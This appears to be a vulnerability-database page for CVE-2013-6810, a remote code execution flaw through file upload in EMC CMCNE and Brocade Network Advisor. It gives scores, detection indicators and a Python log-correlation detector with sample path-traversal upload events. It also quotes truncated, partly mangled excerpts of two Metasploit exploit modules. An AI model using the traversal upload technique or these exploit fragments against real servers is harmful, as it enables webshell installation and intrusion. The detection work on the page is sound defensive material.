CVE-2013-6810
published 2013-12-12
CVE-2013-6810: The server in Brocade Network Advisor before 12.1.0, as used in EMC Connectrix Manager Converged Network Edition (CMCNE), HP B-series SAN Network Advisor, and…
Priority: P2, 72, critical
CVSS 2.0: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: available
EPSS: 17.00% (96.7th percentile)
The server in Brocade Network Advisor before 12.1.0, as used in EMC Connectrix Manager Converged Network Edition (CMCNE), HP B-series SAN Network Advisor, and possibly other products, allows remote attackers to execute arbitrary code by using a servlet to upload an executable file.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| emc | connectrix_manager | — | — |
| emc | connectrix_manager | — | — |
| emc | connectrix_manager | — | — |
Detection & IOCs
- Detect multipart POST requests to /inmservlets/FileUploadController with a custom 'ROOTDIR' HTTP header set to 'ftproot' and a filename parameter containing path traversal sequences targeting the deploy directory.
- Detect multipart POST requests to /HttpFileUpload/FileUploadController.do where the uploaded filename field contains directory traversal sequences (e.g., '..\..\..\deploy\dcm-client.war\').
- Alert on HTTP 200 responses containing the string 'SUCCESSFULLY UPLOADED FILES!' from the target servlets, indicating a successful malicious file upload.
- Monitor for subsequent GET requests to /dcm-client/*.jsp immediately after a POST to the FileUploadController endpoints, indicating payload execution of an uploaded JSP webshell.
- The exploit targets port 80 by default, but the actual Brocade Network Advisor / EMC CMCNE deployment may run on a different port; detections should not be limited to port 80 alone.
- The uploaded JSP filename is randomly generated (4–32 alphanumeric characters) per exploit run, so filename-based detections must use a pattern match (e.g., regex for random alphanum + .jsp in /dcm-client/) rather than a static filename.
- Two distinct servlet endpoints are exploited across the two PoC modules (inmservlets/FileUploadController vs HttpFileUpload/FileUploadController.do); both must be covered in detection rules.
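
The detections listed above, combined into one correlation pass over parsed HTTP log events. This is an added example, not a rule from the page's sources; the event record layout, its field names and the 300-second correlation window are assumptions, and the sample events are constructed.

```python
import re
from urllib.parse import unquote

UPLOAD_PATHS = {"/inmservlets/fileuploadcontroller",
                "/httpfileupload/fileuploadcontroller.do"}
TRAVERSAL = re.compile(r"\.\.[\\/]")                 # ..\ or ../ after URL-decoding
JSP_GET = re.compile(r"/dcm-client/[A-Za-z0-9]{4,32}\.jsp", re.I)
SUCCESS = "SUCCESSFULLY UPLOADED FILES!"
WINDOW = 300  # assumed: seconds in which a JSP GET is tied to a flagged upload

def analyze(events):
    """Return (severity, src, detail) findings; the port is deliberately ignored."""
    findings, uploads = [], {}          # uploads: src -> time of last flagged POST
    for ev in sorted(events, key=lambda e: e["ts"]):
        path = unquote(ev["path"]).split("?")[0]
        if ev["method"] == "POST" and path.lower() in UPLOAD_PATHS:
            headers = {k.lower(): v for k, v in ev.get("headers", {}).items()}
            reasons = []
            if TRAVERSAL.search(unquote(ev.get("filename", ""))):
                reasons.append("traversal in filename")
            if headers.get("rootdir", "").lower() == "ftproot":
                reasons.append("ROOTDIR=ftproot")
            if not reasons:
                continue                # ordinary upload, nothing to report
            done = ev["status"] == 200 and SUCCESS in ev.get("body", "")
            findings.append(("high" if done else "medium", ev["src"],
                             f"POST {path}: " + ", ".join(reasons)))
            uploads[ev["src"]] = ev["ts"]
        elif ev["method"] == "GET" and JSP_GET.fullmatch(path):
            t0 = uploads.get(ev["src"])
            if t0 is not None and ev["ts"] - t0 <= WINDOW:
                findings.append(("critical", ev["src"], f"GET {path} after upload"))
    return findings

# Constructed sample events (documentation address ranges, made-up file names).
SAMPLE = [
    {"ts": 100, "src": "198.51.100.7", "port": 8080, "method": "POST",
     "path": "/inmservlets/FileUploadController", "headers": {"ROOTDIR": "ftproot"},
     "filename": "..\\..\\..\\deploy\\dcm-client.war\\aB3dE9.jsp",
     "status": 200, "body": "SUCCESSFULLY UPLOADED FILES!"},
    {"ts": 104, "src": "198.51.100.7", "port": 8080, "method": "GET",
     "path": "/dcm-client/aB3dE9.jsp", "status": 200},
    {"ts": 200, "src": "192.0.2.10", "port": 80, "method": "POST",
     "path": "/HttpFileUpload/FileUploadController.do",
     "filename": "..%5C..%5C..%5Cdeploy%5Cdcm-client.war%5Cq7Zx.jsp", "status": 500},
    {"ts": 300, "src": "192.0.2.55", "port": 80, "method": "GET",
     "path": "/dcm-client/login.jsp", "status": 200},
]
```

A JSP request under /dcm-client/ is only escalated when the same source made a flagged upload inside the window, which keeps ordinary client pages such as the constructed `login.jsp` request out of the findings.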
No detection rules found.
Exploit-DB
EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)
exploitdb·2017-09-13
---
```ruby
require 'msf/core'
class MetasploitModule 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
  'Description' => %q{
    This module exploits a file upload vulnerability found in EMC
    Connectrix Manager Converged Network Edition [ 'james fitts' ],
  'License' => MSF_LICENSE,
  'References' =>
    [
      [ 'ZDI', '13-280' ],
      [ 'CVE', '2013-6810' ]
    ],
  'Privileged' => true,
  'Platform' => 'win',
  'Arch' => ARCH_JAVA,
  'Targets' =>
    [
      [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
    ],
  'DefaultTarget' => 0,
  'DisclosureDate' => 'Dec 18 2013'))
  register_options([
    Opt::RPORT(80)
  ], self.class)
end
def exploit
  peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
  deploy = "..\\..\\..\\deploy\\dcm-
```
Exploit-DB
EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)
exploitdb·2017-09-13
---
```ruby
require 'msf/core'
class MetasploitModule 'EMC CMCNE FileUploadController Remote Code Execution',
  'Description' => %q{
    This module exploits a fileupload vulnerability found in EMC
    Connectrix Manager Converged Network Edition MSF_LICENSE,
  'Author' => [ 'james fitts' ],
  'References' =>
    [
      [ 'ZDI', '13-279' ],
      [ 'CVE', '2013-6810' ]
    ],
  'Privileged' => true,
  'Platform' => 'win',
  'Arch' => ARCH_JAVA,
  'Targets' =>
    [
      [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
    ],
  'DefaultTarget' => 0,
  'DisclosureDate' => 'Dec 18 2013'))
  register_options([
    Opt::RPORT(80)
  ], self.class)
end
def exploit
  peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
  deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
  jsp = payload.encode
```
- http://archives.neohapsis.com/archives/bugtraq/2013-12/0053.html
- http://marc.info/?l=bugtraq&m=138723620521347&w=2
- http://secunia.com/advisories/56143
- http://www.attrition.org/pipermail/vim/2014-January/002755.html
- http://www.securitytracker.com/id/1029485
- http://www.zerodayinitiative.com/advisories/ZDI-13-283/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/90728
- https://www.exploit-db.com/exploits/42701/
- https://www.exploit-db.com/exploits/42702/